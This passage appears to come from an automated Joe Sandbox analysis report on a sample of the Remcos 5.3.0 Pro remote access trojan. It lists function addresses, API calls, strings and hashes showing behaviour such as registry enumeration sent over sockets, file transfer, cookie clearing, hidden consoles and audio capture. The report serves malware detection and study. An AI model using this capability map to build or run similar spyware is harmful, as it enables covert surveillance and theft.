                                                                                                                                                                                                                                                                                                                              • API String ID: 1454806937-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 9c5884e815b8b4e486a01e2dce58e73a4a159e011904fdfaec3f45072de3766a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 1c25d828e7dc9e5a799880e6beba9fba428e5808915dd61ab7202b005f613080
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9c5884e815b8b4e486a01e2dce58e73a4a159e011904fdfaec3f45072de3766a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 89215EB9D8121CBFEB119BA49C8CEEB76ACEB09B44F000D65F505D2180D7709E558BB0
                                                                                                                                                                                                                                                                                                                              Function 00444409 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • _memcmp.LIBVCRUNTIME ref: 004446B3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00444724
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044473D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044476F
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00444778
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00444784
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                                                                                                              • String ID: C
                                                                                                                                                                                                                                                                                                                              • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c80eba29621552cc0015daa61550ea74c149dc0acfa072f5cc390db0d0044802
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 096df170494440478aae843429242aea5750b14c08813bebb9acd843c79e49b1
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c80eba29621552cc0015daa61550ea74c149dc0acfa072f5cc390db0d0044802
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8B14A75A012199FEB24DF18C884BAEB7B4FF49314F1085AEE909A7351D739AE90CF44
                                                                                                                                                                                                                                                                                                                              Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: tcp$udp
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-3725065008
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                                                                                                                                                                                                                              • Instruction ID: e5bb8fef491b59a621f975c33c92e719a9e773eef76f1c958f584ffae729cd60
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3317bb7e427a09276a98136aacea04ff7717d48f4dd4b8ff28f9b5a2aba46388
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9171AB716083028FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                                                                                                                                                                                                                                                                                              Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 004017F4
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                                                                                                                                                                                                                              • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 004017BC
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                                                                                                                                                                                                                                              • String ID: T=G$X}$>G$>G
                                                                                                                                                                                                                                                                                                                              • API String ID: 1596592924-1839278954
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 575e4c7363fd16fb853833927232439696c66fa3a59195aad406f6f506f91d39
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 0943ace0b6a80c7a2dd7ea0048a529cdefdd5a29547fab9333b46e46416e0a54
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 575e4c7363fd16fb853833927232439696c66fa3a59195aad406f6f506f91d39
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D941F0716042008BC325FB75DDA6AAE73A4EB90318F00453FF50AAB1F2DF789985C65E
                                                                                                                                                                                                                                                                                                                              Function 00412C88 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                                                                                                                                                              • String ID: TUF$TUFTUF$>G$DG$DG
                                                                                                                                                                                                                                                                                                                              • API String ID: 3114080316-72097156
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cf6b8ebac21d2dd4a0a00435169baf5ddcacbb67160d2a217508608402e6d0b8
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 977689a643a5ec5a4c60f988ad8168500f8ba0dfdc14b2429fd77a11b5167535
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cf6b8ebac21d2dd4a0a00435169baf5ddcacbb67160d2a217508608402e6d0b8
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9041A2316042009BC224F635D8A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                                                                                                                                                                                              Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                                                                                                                                                                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                                                                                                                                                                              • String ID: .part
                                                                                                                                                                                                                                                                                                                              • API String ID: 1303771098-3499674018
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 91efb928ab58b99a4f94edbea7227f1e7da5a0bcd6581a9c1418464cc9c82935
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 92ff4720e6a7c249f3c3ae71a82c25b1888123647972eaae8327678ea1ca1cb3
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91efb928ab58b99a4f94edbea7227f1e7da5a0bcd6581a9c1418464cc9c82935
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2131C4715083009FD210EF21DD459AFB7A8FB84315F40093FF9C6A21A1DB38AA48CB9A
                                                                                                                                                                                                                                                                                                                              Function 0041A82D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 0041A906
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                                                                                                                                                                                                                                                              • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                                                                                                                                                                                                                                                                                              • API String ID: 3286818993-703403762
                                                                                                                                                                                                                                                                                                                              • Opcode ID: e1620419dbdffa65eb6f085ef8bf141a67639418e7f5ce8d10156c28da364c8a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 668df6a2f2e8443cbe55da1b88d556a36153785c12b7582e9a7b6ce06fc50c8b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1620419dbdffa65eb6f085ef8bf141a67639418e7f5ce8d10156c28da364c8a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C217472B001046BDB04BAB58C96DEE366D9B85358F14093FF412B72D3EE3C9D9942A9
                                                                                                                                                                                                                                                                                                                              Function 0040B6EA Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                                                                                                              • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                                                                                                                                                              • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$TUF
                                                                                                                                                                                                                                                                                                                              • API String ID: 1133728706-1738023494
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 08b20ae2faf31cf70907863353a653039ba16470d78fd0aefd1f5b84fc1cfbad
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c183ecd3189b8021203cc80da109e2de7a31ac9d6a13988019f9cddb43f3bc3e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08b20ae2faf31cf70907863353a653039ba16470d78fd0aefd1f5b84fc1cfbad
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 84216D71900219A6CB04F7B2DCA69EE7764AE95318F40013FA902771D2EB7C9A49C6DE
                                                                                                                                                                                                                                                                                                                              Function 0041BEC0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • AllocConsole.KERNEL32(00474358), ref: 0041BEC9
                                                                                                                                                                                                                                                                                                                              • GetConsoleWindow.KERNEL32 ref: 0041BECF
                                                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 0041BEE2
                                                                                                                                                                                                                                                                                                                              • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BF07
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                                                                                                                                                                              • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                                                                                                                                                                                                              • API String ID: 4067487056-2527699604
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 29466b5f89b818b32aee09a22b3208d506810ef61d6e100b210d0f7536d9046d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0969bb2dc50103f751eab8b76b07649baec71243ec5d0269df0f19859633e99b
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F0121B1980304BAD600FBF29D4BFDD37AC9B14705F5004277648EB193E6BCA554466D
                                                                                                                                                                                                                                                                                                                              Function 00449960 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 004499BA
                                                                                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 004499F2
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE63,?,?,?,00449BB1,00000001,00000001,?), ref: 00449A40
                                                                                                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00449AD7
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B3A
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B50
                                                                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00449B75
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3864826663-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 81d70c20703e66394a8e6e24da3589bfc2c015b76e7b2aedf7d205086cdaf592
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2fc013a73a1c4821613f4f7d6933c77eebbc764427e3f4eacb424f728eff0283
